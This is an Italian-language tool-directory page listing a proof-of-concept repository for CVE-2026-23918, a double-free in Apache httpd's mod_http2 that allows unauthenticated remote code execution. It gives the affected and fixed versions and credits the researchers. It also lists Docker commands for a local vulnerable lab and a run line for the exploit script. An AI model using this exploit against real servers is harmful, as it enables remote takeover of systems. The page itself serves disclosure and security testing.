Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23918 — Double-free nella pulizia dello stream di mod_http2 di Apache httpd che porta a RCE pre-autenticazione. | Kitploit
Strumenti/GitHubGitHub/striga-ai/cve-2026-23918
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubstriga-ai/cve-2026-23918

CVE-2026-23918

Double-free nella pulizia dello stream di mod_http2 di Apache httpd che porta a RCE pre-autenticazione.

Vedi Repository
31644 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23918

Double-free nella pulizia dello stream di mod_http2 di Apache httpd che porta a una pre-auth RCE.

Versioni interessate: httpd 2.4.66 con mod_http2 e MPM multi-thread (event/worker). Corretto in: 2.4.67.

Trovato e segnalato da Bartlomiej Dmitruk (striga.ai) e Stanislaw Strzalkowski (isec.pl).

Analisi: https://striga.ai/research/apache-httpd-mod-http2-double-free

Requisiti

  • Docker
  • Python 3

Utilizzo

Costruisci e avvia l'ambiente vulnerabile:

root@kitploit:~
docker build -t httpd-poc .
docker run -d --name httpd-poc --privileged -p 9443:443 httpd-poc

Ottieni gli indirizzi di system() e dello scoreboard:

root@kitploit:~
docker exec httpd-poc python3 /getaddr.py 1

Esegui l'exploit:

root@kitploit:~
python3 poc.py --host localhost --port 9443 \
    --cmd 'date >> /tmp/win' --workers 64 \
    --system <system_addr> --scoreboard <scoreboard_addr>

Verifica (l'esecuzione è probabilistica, può richiedere da minuti a ore):

root@kitploit:~
docker exec httpd-poc cat /tmp/win

Pulizia

root@kitploit:~
docker rm -f httpd-poc
Scarica lo strumento